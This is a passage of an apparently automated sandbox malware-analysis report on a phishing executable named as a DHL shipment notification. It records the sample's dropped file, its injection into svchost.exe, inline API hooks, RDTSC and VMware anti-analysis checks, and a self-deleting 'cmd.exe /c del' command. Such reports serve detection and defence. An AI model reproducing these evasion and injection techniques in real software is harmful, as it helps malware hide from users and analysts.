          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030E03DA17_2_030E03DA
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030EDBD217_2_030EDBD2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0305ABD817_2_0305ABD8
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030DFA2B17_2_030DFA2B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030F22AE17_2_030F22AE
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0302F90017_2_0302F900
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0304412017_2_03044120
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030499BF17_2_030499BF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030E100217_2_030E1002
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030FE82417_2_030FE824
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0304A83017_2_0304A830
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0303B09017_2_0303B090
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030520A017_2_030520A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030F20A817_2_030F20A8
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030F28EC17_2_030F28EC
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030FDFCE17_2_030FDFCE
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030F1FF117_2_030F1FF1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030ED61617_2_030ED616
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03046E3017_2_03046E30
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030F2EF717_2_030F2EF7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030F2D0717_2_030F2D07
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03020D2017_2_03020D20
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030F1D5517_2_030F1D55
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0305258117_2_03052581
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030F25DD17_2_030F25DD
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0303D5E017_2_0303D5E0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0303841F17_2_0303841F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030ED46617_2_030ED466
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0239EBD917_2_0239EBD9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_02389E5017_2_02389E50
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_02389E4B17_2_02389E4B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_02382FB017_2_02382FB0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_02382D9017_2_02382D90
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_02382D8717_2_02382D87
          Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 0302B150 appears 87 times
          Source: C:\Users\user\AppData\Local\Temp\aeokw.exeCode function: String function: 00D72400 appears 54 times
          Source: C:\Users\user\AppData\Local\Temp\aeokw.exeCode function: String function: 00D74599 appears 38 times
          Source: C:\Users\user\AppData\Local\Temp\aeokw.exeCode function: 2_2_0041A320 NtCreateFile,2_2_0041A320
          Source: C:\Users\user\AppData\Local\Temp\aeokw.exeCode function: 2_2_0041A3D0 NtReadFile,2_2_0041A3D0
          Source: C:\Users\user\AppData\Local\Temp\aeokw.exeCode function: 2_2_0041A450 NtClose,2_2_0041A450
          Source: C:\Users\user\AppData\Local\Temp\aeokw.exeCode function: 2_2_0041A500 NtAllocateVirtualMemory,2_2_0041A500
          Source: C:\Users\user\AppData\Local\Temp\aeokw.exeCode function: 2_2_0041A31F NtCreateFile,2_2_0041A31F
          Source: C:\Users\user\AppData\Local\Temp\aeokw.exeCode function: 2_2_0041A3CE NtReadFile,2_2_0041A3CE
          Source: C:\Users\user\AppData\Local\Temp\aeokw.exeCode function: 2_2_0041A4FB NtAllocateVirtualMemory,2_2_0041A4FB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03069A50 NtCreateFile,LdrInitializeThunk,17_2_03069A50
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03069910 NtAdjustPrivilegesToken,LdrInitializeThunk,17_2_03069910
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030699A0 NtCreateSection,LdrInitializeThunk,17_2_030699A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03069840 NtDelayExecution,LdrInitializeThunk,17_2_03069840
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03069860 NtQuerySystemInformation,LdrInitializeThunk,17_2_03069860
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03069710 NtQueryInformationToken,LdrInitializeThunk,17_2_03069710
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03069780 NtMapViewOfSection,LdrInitializeThunk,17_2_03069780
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03069FE0 NtCreateMutant,LdrInitializeThunk,17_2_03069FE0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03069650 NtQueryValueKey,LdrInitializeThunk,17_2_03069650
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03069660 NtAllocateVirtualMemory,LdrInitializeThunk,17_2_03069660
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030696D0 NtCreateKey,LdrInitializeThunk,17_2_030696D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030696E0 NtFreeVirtualMemory,LdrInitializeThunk,17_2_030696E0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03069540 NtReadFile,LdrInitializeThunk,17_2_03069540
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030695D0 NtClose,LdrInitializeThunk,17_2_030695D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03069B00 NtSetValueKey,17_2_03069B00
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0306A3B0 NtGetContextThread,17_2_0306A3B0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03069A00 NtProtectVirtualMemory,17_2_03069A00
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03069A10 NtQuerySection,17_2_03069A10
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03069A20 NtResumeThread,17_2_03069A20
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03069A80 NtOpenDirectoryObject,17_2_03069A80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03069950 NtQueueApcThread,17_2_03069950
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030699D0 NtCreateProcessEx,17_2_030699D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03069820 NtEnumerateKey,17_2_03069820
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0306B040 NtSuspendThread,17_2_0306B040
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030698A0 NtWriteVirtualMemory,17_2_030698A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030698F0 NtReadVirtualMemory,17_2_030698F0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0306A710 NtOpenProcessToken,17_2_0306A710
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03069730 NtQueryVirtualMemory,17_2_03069730
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03069760 NtOpenProcess,17_2_03069760
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0306A770 NtOpenThread,17_2_0306A770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03069770 NtSetInformationFile,17_2_03069770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030697A0 NtUnmapViewOfSection,17_2_030697A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03069610 NtEnumerateValueKey,17_2_03069610
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03069670 NtQueryInformationProcess,17_2_03069670
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03069520 NtWaitForSingleObject,17_2_03069520
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0306AD30 NtSetContextThread,17_2_0306AD30
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03069560 NtWriteFile,17_2_03069560
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030695F0 NtQueryInformationFile,17_2_030695F0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0239A320 NtCreateFile,17_2_0239A320
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0239A3D0 NtReadFile,17_2_0239A3D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0239A450 NtClose,17_2_0239A450
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0239A500 NtAllocateVirtualMemory,17_2_0239A500
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0239A31F NtCreateFile,17_2_0239A31F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0239A3CE NtReadFile,17_2_0239A3CE
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0239A4FB NtAllocateVirtualMemory,17_2_0239A4FB
          Source: DHL SHIPMENT NOTIFICATION 1146789443.exeVirustotal: Detection: 42%
          Source: DHL SHIPMENT NOTIFICATION 1146789443.exeReversingLabs: Detection: 48%
          Source: C:\Users\user\Desktop\DHL SHIPMENT NOTIFICATION 1146789443.exeFile read: C:\Users\user\Desktop\DHL SHIPMENT NOTIFICATION 1146789443.exeJump to behavior
          Source: DHL SHIPMENT NOTIFICATION 1146789443.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\DHL SHIPMENT NOTIFICATION 1146789443.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\DHL SHIPMENT NOTIFICATION 1146789443.exe "C:\Users\user\Desktop\DHL SHIPMENT NOTIFICATION 1146789443.exe"
          Source: C:\Users\user\Desktop\DHL SHIPMENT NOTIFICATION 1146789443.exeProcess created: C:\Users\user\AppData\Local\Temp\aeokw.exe C:\Users\user\AppData\Local\Temp\aeokw.exe C:\Users\user\AppData\Local\Temp\fnnok
          Source: C:\Users\user\AppData\Local\Temp\aeokw.exeProcess created: C:\Users\user\AppData\Local\Temp\aeokw.exe C:\Users\user\AppData\Local\Temp\aeokw.exe C:\Users\user\AppData\Local\Temp\fnnok
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\SysWOW64\svchost.exe
          Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\AppData\Local\Temp\aeokw.exe"
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\DHL SHIPMENT NOTIFICATION 1146789443.exeProcess created: C:\Users\user\AppData\Local\Temp\aeokw.exe C:\Users\user\AppData\Local\Temp\aeokw.exe C:\Users\user\AppData\Local\Temp\fnnokJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\aeokw.exeProcess created: C:\Users\user\AppData\Local\Temp\aeokw.exe C:\Users\user\AppData\Local\Temp\aeokw.exe C:\Users\user\AppData\Local\Temp\fnnokJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\AppData\Local\Temp\aeokw.exe"Jump to behavior
          Source: C:\Users\user\Desktop\DHL SHIPMENT NOTIFICATION 1146789443.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
          Source: C:\Users\user\Desktop\DHL SHIPMENT NOTIFICATION 1146789443.exeCode function: 0_2_00403646 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403646
          Source: C:\Users\user\Desktop\DHL SHIPMENT NOTIFICATION 1146789443.exeFile created: C:\Users\user\AppData\Local\Temp\nsk2670.tmpJump to behavior
          Source: classification engineClassification label: mal100.troj.evad.winEXE@9/4@3/3
          Source: C:\Users\user\Desktop\DHL SHIPMENT NOTIFICATION 1146789443.exeCode function: 0_2_004021AA CoCreateInstance,0_2_004021AA
          Source: C:\Users\user\Desktop\DHL SHIPMENT NOTIFICATION 1146789443.exeFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\DHL SHIPMENT NOTIFICATION 1146789443.exeCode function: 0_2_00404ABB GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_00404ABB
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1524:120:WilError_01
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: DHL SHIPMENT NOTIFICATION 1146789443.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: C:\mvbaz\xgpqcu\xwqn\f27888ddf02c4c6aa9eb1b8f5b3a0302\rlifld\nwoxnqyr\Release\nwoxnqyr.pdb source: DHL SHIPMENT NOTIFICATION 1146789443.exe, 00000000.00000002.271439175.0000000000789000.00000004.00000001.01000000.00000003.sdmp, aeokw.exe, 00000001.00000002.258082115.0000000000D7E000.00000002.00000001.01000000.00000004.sdmp, aeokw.exe, 00000001.00000000.249383523.0000000000D7E000.00000002.00000001.01000000.00000004.sdmp, aeokw.exe, 00000002.00000002.322132231.0000000000D7E000.00000002.00000001.01000000.00000004.sdmp, svchost.exe, 00000011.00000002.515611102.000000000352F000.00000004.10000000.00040000.00000000.sdmp, nsk2671.tmp.0.dr, aeokw.exe.0.dr
          Source: Binary string: wntdll.pdbUGP source: aeokw.exe, 00000001.00000003.255155254.0000000002E70000.00000004.00001000.00020000.00000000.sdmp, aeokw.exe, 00000001.00000003.254132987.000000001ADE0000.00000004.00001000.00020000.00000000.sdmp, aeokw.exe, 00000002.00000003.260122291.00000000012DE000.00000004.00000800.00020000.00000000.sdmp, aeokw.exe, 00000002.00000002.322328355.0000000001470000.00000040.00000800.00020000.00000000.sdmp, aeokw.exe, 00000002.00000002.322514089.000000000158F000.00000040.00000800.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.322000917.0000000002C00000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.323291458.0000000002E00000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: aeokw.exe, 00000001.00000003.255155254.0000000002E70000.00000004.00001000.00020000.00000000.sdmp, aeokw.exe, 00000001.00000003.254132987.000000001ADE0000.00000004.00001000.00020000.00000000.sdmp, aeokw.exe, 00000002.00000003.260122291.00000000012DE000.00000004.00000800.00020000.00000000.sdmp, aeokw.exe, 00000002.00000002.322328355.0000000001470000.00000040.00000800.00020000.00000000.sdmp, aeokw.exe, 00000002.00000002.322514089.000000000158F000.00000040.00000800.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.322000917.0000000002C00000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.323291458.0000000002E00000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmp
          Source: Binary string: svchost.pdb source: aeokw.exe, 00000002.00000002.322286626.00000000011DA000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: svchost.pdbUGP source: aeokw.exe, 00000002.00000002.322286626.00000000011DA000.00000004.00000020.00020000.00000000.sdmp
          Source: C:\Users\user\AppData\Local\Temp\aeokw.exeCode function: 1_2_00D72445 push ecx; ret 1_2_00D72458
          Source: C:\Users\user\AppData\Local\Temp\aeokw.exeCode function: 2_2_00401026 push 5DA8CC51h; iretd 2_2_0040102E
          Source: C:\Users\user\AppData\Local\Temp\aeokw.exeCode function: 2_2_0041E8F5 pushad ; ret 2_2_0041E8FA
          Source: C:\Users\user\AppData\Local\Temp\aeokw.exeCode function: 2_2_0040E32E push ebx; ret 2_2_0040E32F
          Source: C:\Users\user\AppData\Local\Temp\aeokw.exeCode function: 2_2_0041D475 push eax; ret 2_2_0041D4C8
          Source: C:\Users\user\AppData\Local\Temp\aeokw.exeCode function: 2_2_0041D4C2 push eax; ret 2_2_0041D4C8
          Source: C:\Users\user\AppData\Local\Temp\aeokw.exeCode function: 2_2_0041D4CB push eax; ret 2_2_0041D532
          Source: C:\Users\user\AppData\Local\Temp\aeokw.exeCode function: 2_2_0041D52C push eax; ret 2_2_0041D532
          Source: C:\Users\user\AppData\Local\Temp\aeokw.exeCode function: 2_2_00D72445 push ecx; ret 2_2_00D72458
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0307D0D1 push ecx; ret 17_2_0307D0E4
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0238E32E push ebx; ret 17_2_0238E32F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0239E8F5 pushad ; ret 17_2_0239E8FA
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0239D475 push eax; ret 17_2_0239D4C8
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0239D4CB push eax; ret 17_2_0239D532
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0239D4C2 push eax; ret 17_2_0239D4C8
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0239D52C push eax; ret 17_2_0239D532
          Source: C:\Users\user\Desktop\DHL SHIPMENT NOTIFICATION 1146789443.exeFile created: C:\Users\user\AppData\Local\Temp\aeokw.exeJump to dropped file

          Hooking and other Techniques for Hiding and Protection

          barindex
          Modifies the prolog of user mode functions (user mode inline hooks)
          Source: explorer.exeUser mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x8E 0xEE 0xE6
          Source: C:\Users\user\AppData\Local\Temp\aeokw.exeCode function: 1_2_00D71890 RtlEncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,1_2_00D71890
          Source: C:\Users\user\Desktop\DHL SHIPMENT NOTIFICATION 1146789443.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion

          barindex
          Tries to detect virtualization through RDTSC time measurements
          Source: C:\Users\user\AppData\Local\Temp\aeokw.exeRDTSC instruction interceptor: First address: 0000000000409904 second address: 000000000040990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\AppData\Local\Temp\aeokw.exeRDTSC instruction interceptor: First address: 0000000000409B6E second address: 0000000000409B74 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\svchost.exeRDTSC instruction interceptor: First address: 0000000002389904 second address: 000000000238990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\svchost.exeRDTSC instruction interceptor: First address: 0000000002389B6E second address: 0000000002389B74 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\explorer.exe TID: 6084Thread sleep time: -50000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exe TID: 2312Thread sleep time: -40000s >= -30000sJump to behavior
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\svchost.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\svchost.exeLast function: Thread delayed
          Source: C:\Users\user\AppData\Local\Temp\aeokw.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcessgraph_1-6508
          Source: C:\Users\user\AppData\Local\Temp\aeokw.exeCode function: 2_2_00409AA0 rdtsc 2_2_00409AA0
          Source: C:\Users\user\AppData\Local\Temp\aeokw.exeAPI coverage: 4.5 %
          Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 7.7 %
          Source: C:\Users\user\AppData\Local\Temp\aeokw.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\Desktop\DHL SHIPMENT NOTIFICATION 1146789443.exeCode function: 0_2_00405D7A CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405D7A
          Source: C:\Users\user\Desktop\DHL SHIPMENT NOTIFICATION 1146789443.exeCode function: 0_2_004069A4 FindFirstFileW,FindClose,0_2_004069A4
          Source: C:\Users\user\Desktop\DHL SHIPMENT NOTIFICATION 1146789443.exeCode function: 0_2_0040290B FindFirstFileW,0_2_0040290B
          Source: C:\Users\user\Desktop\DHL SHIPMENT NOTIFICATION 1146789443.exeAPI call chain: ExitProcess graph end nodegraph_0-3509
          Source: C:\Users\user\AppData\Local\Temp\aeokw.exeAPI call chain: ExitProcess graph end nodegraph_1-6510
          Source: explorer.exe, 00000005.00000000.346368110.00000000051AC000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
          Source: explorer.exe, 00000005.00000000.305531432.000000000546A000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: =b\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000005.00000000.303730790.00000000051D2000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: -94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}71USER
          Source: explorer.exe, 00000005.00000000.270277759.0000000006005000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00
          Source: explorer.exe, 00000005.00000000.290260130.0000000005EAB000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000005.00000000.270277759.0000000006005000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000005.00000000.303730790.00000000051D2000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
          Source: explorer.exe, 00000005.00000000.270277759.0000000006005000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}ed:Wednesday:Thu:Thursday:Fri:Friday:Sat:Saturday
          Source: explorer.exe, 00000005.00000000.268351234.000000000510C000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
          Source: explorer.exe, 00000005.00000000.270277759.0000000006005000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00dRom0cY
          Source: C:\Users\user\AppData\Local\Temp\aeokw.exeCode function: 1_2_00D77A95 IsDebuggerPresent,1_2_00D77A95
          Source: C:\Users\user\AppData\Local\Temp\aeokw.exeCode function: 1_2_00D7558A EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,1_2_00D7558A
          Source: C:\Users\user\AppData\Local\Temp\aeokw.exeCode function: 1_2_00D786ED __lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock,1_2_00D786ED
          Source: C:\Users\user\AppData\Local\Temp\aeokw.exeCode function: 2_2_00409AA0 rdtsc 2_2_00409AA0
          Source: C:\Users\user\AppData\Local\Temp\aeokw.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0304A309 mov eax, dword ptr fs:[00000030h]17_2_0304A309
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0304A309 mov eax, dword ptr fs:[00000030h]17_2_0304A309
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0304A309 mov eax, dword ptr fs:[00000030h]17_2_0304A309
